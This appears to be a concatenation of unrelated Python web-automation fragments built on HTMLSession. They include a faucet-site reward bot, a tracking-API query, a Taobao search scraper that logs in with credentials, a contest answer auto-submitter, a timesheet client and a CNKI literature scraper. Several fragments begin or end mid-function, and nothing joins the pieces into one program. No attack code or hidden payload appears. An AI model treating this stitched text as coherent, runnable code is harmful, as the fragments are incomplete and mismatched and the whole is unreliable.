self._logger.info('Timer not running') return 0 countdown = match.group(1) self._logger.info(f'Timer value: {countdown}') return int(countdown) @_check_login def get_balance(self): self._logger.info('Retrieving points balance') html = self._get_main_page() balance = html.find('#balance', first=True).text self._logger.info(f'Balance: {balance}') return float(balance.replace(',', '')) @_check_login def get_rp_bonus_timer(self): return self._get_rewards_timer(_RewardType.Points) @_check_login def get_lottery_bonus_timer(self): return self._get_rewards_timer(_RewardType.Lottery) @_check_login def get_btc_bonus_timer(self): return self._get_rewards_timer(_RewardType.FreeBTC) @_check_login def get_rewards_balance(self): self._logger.info('Retrieving rewards balance') html = self._get_main_page() points = html.find('div.user_reward_points', first=True).text self._logger.info(f'Rewards points: {points}') return int(points.replace(',', '')) def _get_rewards_timer(self, reward_type): self._logger.info(f'Retrieving rewards timer: {reward_type.bonus_id}') html = self._get_main_page() bonus_pattern = re.compile(f'BonusEndCountdown\("{reward_type.bonus_id}",(\d+)\)') match = bonus_pattern.search(html.html) if not match: self._logger.info(f'Bonus timer: {reward_type.bonus_id} not running') return 0 countdown = match.group(1) self._logger.info(f'Timer value: {countdown}') return int(countdown) def _get_main_page(self): html, expiry, cache_time = self._cache['html'] if datetime.now() >= expiry: self._logger.debug('Downloading main page') html = self._session.get(f'{self._URL}/?op=home').html expiry = datetime.now() + timedelta(seconds=cache_time) self._cache['html'] = (html, expiry, cache_time) return html def _activate_bonus(self, reward_type, amount): self._logger.info('Activating: %s %d bonus' % (reward_type.name, amount)) response = self._session.get(f'{self._URL}/' f'?op=redeem_rewards' f'&id={reward_type.bonus_id}_{amount}' f'&points=' f'&csrf_token={self._session.headers["x-csrf-token"]}') result = response.text.split(':') if result[0] == 's': self._logger.info(f'Bonus activation successful') return True elif result[0] == 'e': self._logger.error(f'Roll failed: {result[1]}') else: self._logger.error(f'Roll failed: {response.text}') return False def _get_roll_seed(self, length=16): self._logger.info('Generating roll seed') chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890' seed = str.join('', (random.choice(chars) for i in range(length))) self._logger.debug('Seed: %s' % seed) return seed
# print(data) # print(data["items"]) data_list = data["items"] data_list_items = data_list[0] # print(data_list_items) data_nm = data_list_items["nm"] # print(data_nm) if data_nm == 'profpererobka': reportResourceId = data_list_items["id"] print(f'reportResourceId: {reportResourceId}') params = 'core/search_items&sid=' + sid + '¶ms=' cur_object = 'AA9186XE' body = '{"spec":{"itemsType":"avl_unit","propName":"sys_name","propValueMask":"' + cur_object + \ '","sortType":"sys_name"},"force":1,"flags":1,"from":0,"to":0}' url_params = url_resurs + params + body print(f'{url_host}{url_resurs}{params}') #res = session.get(url_host + url_params) res = session.post(url_host + url_resurs + params, body) # "Content-Type", "application/json" if res.status_code != 200: exit(res.status_code) data = res.json() print(data) # reportObjectId = data['items'][0]['id'] # print(f'reportObjectId: {reportObjectId}')
class Engine: def __init__(self, **kwargs): self.q = None self.s = None self.cps = None self.cat = None self.ppath = None self.loc = None self.mode = None self.kwargs = None self.json = None self.url = None # 网站url(必需) self.cookie = None # 验证登入(必需) self.filter = None self.session = HTMLSession() self.article = "https://s.taobao.com/search?" # 商品url self.store = "https://shopsearch.taobao.com/search?" # 店铺url self.header = { "cookie": None, } def get_cookie(self, user, password): """获取cookie""" url = 'https://login.taobao.com/newlogin/login.do?appName=taobao&fromSite=0' parameter = { 'loginId': user, 'password2': password, } html = self.session.post(url, data=parameter) print(html.cookies) self.header['cookie'] = html.cookies def __get_parameter(self, s): """获取参数""" self.kwargs = { 'q': self.q, } if self.mode == '宝贝': self.url = self.article else: self.url = self.store if self.cps == 'yes': self.kwargs['cps'] = 'yes' if self.cat: self.kwargs['cat'] = self.cat else: self.kwargs['ppath'] = self.ppath if self.loc: self.kwargs['loc'] = self.loc if s == 0: pass else: self.kwargs['s'] = s * 44 return self.kwargs def __get_html(self, s): """获取网页内容并解码 """ self.__get_parameter(s) html = self.session.get(self.url, headers=self.header, params=self.kwargs) print(html.url) html = html.text start = html.find('g_page_config = ') + len('g_page_config = ') end = html.find('"shopcardOff":true}') + len('"shopcardOff":true}') # with open('index.html', 'w', encoding='utf-8') as f: # f.write(html) js = json.loads(html[start:end + 1]) self.json.append(js) sleep(1) def load_data(self): """ 获取搜索数据 搜索结果写到json文件里面 """ self.json = [] for s in range(int(self.s)): self.__get_html(s) self.set_auctions() # self.set_filter() def set_ppath(self, ppath): """设置ppath值 : ;""" self.cps = 'yes' self.ppath = ppath.replace(":", "%3A").replace(";", "%3B") def set_loc(self, loc): """设置loc值 ,""" self.cps = 'yes' self.ppath = self.ppath if self.ppath else '' self.loc = loc.replace(",", "%2C") def set_auctions(self): """ 设置网站所有商品信息 list """ return dataprocess.set_auctions( [d['mods']["itemlist"]["data"]["auctions"] for d in self.json]) def set_filter(self): """ 设置所有宝贝分类 dict {common(所有分类别) adv(筛选条件)}""" return dataprocess.set_filter( [self.json[0]['mods']["nav"]['data']['common']]) @staticmethod def get_filter(): """get filter""" # return dataprocess.getFilter() ... def get_pager(self): """ 获取 s 页码""" return [d['mods']['pager']['data'] for d in self.json] def get_price(self): """获取受喜率 价格区间 list """ return self.json[0]['mods']['sortbar']['data']['price']['rank'] def get_related(self): """ 获取相关搜索 list """ return self.json[0]["related"]["data"]["words"] def get_tab(self): """ 获取tab参数 list""" return self.json[0]["tab"]["data"]["tabs"] def get_header(self): """ 获取url参数 dict q 关键字 tabParams 后缀 js stats_click initiative_id ie dropdown 切换前缀 list url text """ return self.json[0]["header"]["data"] def detection(self): ...
# i = 0 # while i < len(txt2): # if txt2[i: i + 4] == "frac": # in_frac == True # # if txt2[i] == "(": # cnt += 1 # if txt2[i] == ")": # cnt -= 1 # if cnt == 0: # seg += 1 # if seg == 2: # txt1 = txt2[:i + 1] # txt2 = txt2[i + 1:] # break # print(txt2) try: # print("xd") # xd = input() res, err = integrate.quad(f_(txt2), mn, mx) print(mn, mx, res) res = session.post("http://202.38.93.111:10190/submit", data={"ans": "%f" % res}) print("success!!", total) print(res.content) except Exception as e: res = session.post("http://202.38.93.111:10190/submit", data={"ans": "2.33333333"})
class TimesheetAPI: LOGIN_URL = "https://www.timesheets.com.au/tplogin/default.asp" VIEW_TIMESHEET_URL = "https://www.timesheets.com.au/tp60/ViewTimeSheet.asp" INPUT_TIME_URL = "https://www.timesheets.com.au/tp60/InputTime.asp" ERROR_TABLE_XPATH = '//a[@name="ErrorTable"]/following-sibling::table' LoginError = LoginError WebsiteError = WebsiteError def __init__(self): self.session = HTMLSession() self.user_context_id = None self.staff_id = None self.logged_in = False def _parse_html_login_errors(self, error_table): error_tds = error_table.xpath( '//img[@src="images/invalid.png"]/ancestor::tr[1]/td[2]' ) return [e.text for e in error_tds] def _parse_html_options(self, html, option_name, selected=False): if selected: options = html.xpath( f'//select[@name="{option_name}"]//option[@selected]' ) or html.xpath(f'//input[@name="{option_name}"]') else: options = html.xpath( f'//select[@name="{option_name}"]//option[not(@value="")]' ) options = [(o.attrs.get("value"), o.text) for o in options] if selected: return options[0] if options else None return options def _parse_html_customer_options(self, html): options = self._parse_html_options(html, option_name="CustomerCode_0_0") customers = [] for code, description in options: customers.append( {"customer_code": code, "customer_description": description} ) return customers def _parse_html_project_options(self, html): pattern = ( r"AddProjectEntry\(" "'(?P<customer_code>[^']*?)'," "'(?P<project_code>[^']*?)'," "'(?P<project_psid>[^']*?)'," "'(?P<project_description>[^']*?)'," "(?P<task_count>[^']*?)" "\)\s" ) projects = re.finditer(pattern, html.html) return [p.groupdict() for p in projects] def _parse_html_task_options(self, html): pattern = ( r"AddTaskEntry\(" "'(?P<project_code>[^']*?)'," "'(?P<task_id>[^']*?)'," "'(?P<task_description>[^']*?)'" "\)" ) tasks = re.finditer(pattern, html.html) return [t.groupdict() for t in tasks] def login(self, username, password, customer_id): data = { "CurrentClientTime": "", "compact": "off", "ForceInterface": "S", "systemid": customer_id, "username": username, "password": password, } r = self.session.post(self.LOGIN_URL, data=data) # Detect errors error_table = r.html.xpath(self.ERROR_TABLE_XPATH, first=True) if error_table: errors = self._parse_html_login_errors(error_table) raise LoginError(" ".join(errors)) # Detect rejected logon rejected_login_input = r.html.find('input[name="RejectedLogon"]') if rejected_login_input: raise LoginError("Invalid login credentials.") # Find UserContextID (required for future session requests) user_context_input = r.html.find('input[name="UserContextID"]', first=True) if user_context_input: self.user_context_id = user_context_input.attrs.get("value") else: raise LoginError("UserContextID not found in login response.") # Load ViewTimesheet page to get StaffID r = self.session.post( self.VIEW_TIMESHEET_URL, data={"UserContextID": self.user_context_id} ) staff_id_input = r.html.find('input[name="StaffID"]', first=True) if staff_id_input: self.staff_id = staff_id_input.attrs.get("value") else: raise LoginError("StaffID not found in login response.") self.logged_in = True def get_timecodes(self): if not self.logged_in: raise LoginError("Not logged in.") next_month_end = TODAY + relativedelta(months=+1, day=31) filter_day = next_month_end.strftime("%d-%b-%Y") data = { "UserContextID": self.user_context_id, "StaffID": self.staff_id, "Mode": "Day", "StartDate": filter_day, "EndDate": filter_day, } r = self.session.post(self.INPUT_TIME_URL, data=data) customers = self._parse_html_customer_options(r.html) projects = self._parse_html_project_options(r.html) tasks = self._parse_html_task_options(r.html) return customers, projects, tasks def get_timesheet(self, start_date=None, end_date=None): if start_date is None and end_date is None: # default to get this week's timesheet (excl. previous month) start_date = max( [TODAY + relativedelta(day=1), TODAY + relativedelta(weekday=MO(-1))] ) end_date = TODAY + relativedelta(weekday=FR) r = self.session.post( self.INPUT_TIME_URL, data={ "UserContextID": self.user_context_id, "StaffID": self.staff_id, "Mode": "Week", "StartDate": start_date.strftime("%d-%b-%Y"), "EndDate": end_date.strftime("%d-%b-%Y"), }, ) customer_options, project_options, task_options = self.get_timecodes() return Timesheet( html=r.html, customer_options=customer_options, project_options=project_options, task_options=task_options, ) def post_timesheet(self, timesheet): form_data = timesheet.form_data() row_count = timesheet.count_entries() form_data.update( { "UserContextID": self.user_context_id, "StaffID": self.staff_id, "InputRows": row_count, "Save": "%A0%A0Save%A0%A0", "DataForm": "TimeEntry {}".format(self.staff_id), # Important! # 'OptionsDisplayed': 'N', # 'OverrideAction': '', # 'DeletesPending': '' } ) r = self.session.post( self.INPUT_TIME_URL, data=form_data, headers={"Referer": self.INPUT_TIME_URL}, ) # Detect errors error_table = r.html.xpath(self.ERROR_TABLE_XPATH, first=True) if error_table: errors = self._parse_html_login_errors(error_table) raise WebsiteError(" ".join(errors)) return r
class GetPage(): def __init__(self): self.session = HTMLSession() self.cur_page_num = 1 # 目前页码 # 获取cookie保持会话 self.session.get(BASIC_URL, headers=HEADER) # 传入搜索要用的关键字, 以及搜索条件。必须为str def getSearchResult(self, kword, condition): # 这里可以控制搜索的数据库。不作限制。 static_post_data = { 'action': '', 'NaviCode': '*', 'ua': '1.21', 'isinEn': '1', 'PageName': 'ASP.brief_default_result_aspx', 'DbPrefix': 'SCDB', 'DbCatalog': '中国学术期刊网络出版总库', 'ConfigFile': 'SCDB.xml', 'db_opt': 'CJFQ,CDFD,CMFD,CPFD,IPFD,CCND,CCJD', # 搜索类别(CNKI右侧的) 'his': '0', '__': time.asctime(time.localtime()) + ' GMT+0800 (中国标准时间)' } # 此处可以更改搜索参数 search_condition = { '主题': 'SU$%=|', '关键词': 'KY$=|', '篇名': 'TI$%=|', '摘要': 'AB$%=|', '全文': 'FT$%=|' } u_input = { 'txt_1_sel': '', 'txt_1_value1': '', 'txt_1_relation': '#CNKI_AND', 'txt_1_special1': '=' } u_input['txt_1_sel'] = search_condition.get(condition) u_input['txt_1_value1'] = kword post_data = dict(static_post_data, **u_input) # 发送post请求 req_first = self.session.post(POST_URL, data=post_data, headers=HEADER) # 传入搜索的关键词 k_v = quote(u_input.get('txt_1_value1')) # 构造url发送get请求,得到搜索结果列表页 result_url = GET_PAGE_URL + req_first.text + '&t=1544249384932&keyValue=' + k_v + '&S=1&sorttype=' req_sec = self.session.get(result_url, headers=HEADER) # 解析搜索结果列表页,得到标题、详情页URL、作者、来源、发表时间、数据库、被引、下载 rows = req_sec.html.xpath('//tr[@bgcolor]') for row in rows: td = row.find('td') title = td[1].find('a', first=True).text detail_url = re.sub('/kns', 'http://kns.cnki.net/KCMS', td[1].find('a', first=True).attrs['href']) author = td[2].text journal = td[3].text publish_date = td[4].text database = td[5].text cite_count = row.find('span[class="KnowledgeNetcont"]', first=True) if cite_count: cite_count = cite_count.text else: cite_count = 0 print(title) print(detail_url) print(author) print(journal) print(publish_date) print(database) print(cite_count) i = GetDetail().parsePage(detail_url) if i: for a in i: print(a)